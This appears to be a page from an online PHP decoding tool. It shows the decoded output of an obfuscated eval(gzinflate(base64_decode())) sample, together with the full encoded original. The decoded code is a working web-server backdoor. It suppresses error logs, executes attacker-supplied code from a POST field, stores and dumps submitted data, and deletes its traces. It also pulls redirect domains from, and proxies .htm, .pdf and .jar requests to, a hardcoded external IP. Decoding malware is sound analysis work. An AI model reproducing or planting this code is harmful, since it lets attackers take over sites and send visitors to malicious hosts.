Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode("DZdFrsUKsgT30qP35IGZ9NUDM/uYadIyM7NX/+8OqkqpjKjySod/6q+dqiE9..
Decoded Output download
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r']))
{
print $_GET['r'];
}
elseif (isset($_GET['x']))
{
@unlink('default.log');
@unlink('default.tmp');
@unlink('default.txt');
@unlink('default.php');
print $_GET['x'];
}
elseif (isset($_POST['e']))
{
eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
}
elseif (strlen($_POST['num'])==12 && isset($_POST['buffer']) && $_POST['option']=='g')
{
$fp=@fopen('default.log','a');
@flock($fp,LOCK_EX);
@fputs($fp,$_POST['buffer']."
");
@flock($fp,LOCK_UN);
@fclose($fp);
}
elseif (isset($_GET['up']))
{
print file_get_contents('default.log');
$fp=@fopen('default.log','w');
@flock($fp,LOCK_EX);
@fputs($fp,'');
@flock($fp,LOCK_UN);
@fclose($fp);
}
elseif (preg_match('/^\/([a-z]{4})[.]html/i', $_SERVER['REQUEST_URI']))
{
$doms = @file_get_contents('default.txt');
if (time()-@filemtime('default.tmp') > 10) @unlink('default.tmp');
if (time()-@filemtime('default.txt') > 60 && !@file_exists('default.tmp'))
{
$fp = @fopen ('default.tmp', 'w');
@flock($fp, LOCK_EX);
@fputs($fp, time());
@flock($fp, LOCK_UN);
@fclose($fp);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://78.46.18.206/index.php?u='.mt_rand(1000,9999));
curl_setopt($ch, CURLOPT_HTTPHEADER, array ('X-Real-IP: '.$_SERVER['REMOTE_ADDR'], 'X-Real-Host: '.$_SERVER['HTTP_HOST']));
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
$doms = curl_exec($ch);
curl_close($ch);
if (strlen($doms) > 0)
{
$fp = @fopen ('default.txt', 'w');
@flock($fp, LOCK_EX);
@fputs($fp, $doms);
@flock($fp, LOCK_UN);
@fclose($fp);
}
@unlink('default.tmp');
}
if (strlen($doms) > 0)
{
$doms = explode("
",trim(str_replace("
", "", $doms)));
shuffle($doms);
$url = 'http://'.$doms[0].str_replace('.html','.htm',$_SERVER['REQUEST_URI']);
header('HTTP/1.1 301 Moved Permanently');
header('Location: '.$url);
print '<html><head><meta http-equiv="refresh" content="0;url='.$url.'"></head><body><script type="text/javascript">window.location="'.$url.'";</script></body></html>';
}
}
elseif (preg_match('/^\/([a-z0-9]{1,4})[.](htm|pdf|jar)/i', $_SERVER['REQUEST_URI']))
{
if (isset($_SERVER['HTTP_X_REAL_IP'])) $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_REAL_IP'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://78.46.18.206' . $_SERVER['REQUEST_URI']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array ('X-Real-IP: '.$_SERVER['REMOTE_ADDR'], 'X-Real-Host: '.$_SERVER['HTTP_HOST']));
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);
$page = curl_exec($ch);
curl_close($ch);
if (strlen($page) > 0)
{
$page = str_replace ("HTTP/1.1 100 Continue
", '', $page);
list($headers, $page) = explode("
", $page, 2);
$headers = explode("
", trim($headers));
foreach ($headers as $header) if (preg_match('/(HTTP|Expires|Content|Cache|Pragma|Location)/Usi', $header)) header($header);
print $page;
}
}
exit;Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode("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"))); Function Calls
| gzinflate | 25 |
| base64_decode | 25 |
Stats
| MD5 | 87eb7720241f3dc402e375d7704abcc7 |
| Eval Count | 25 |
| Decode Time | 120 ms |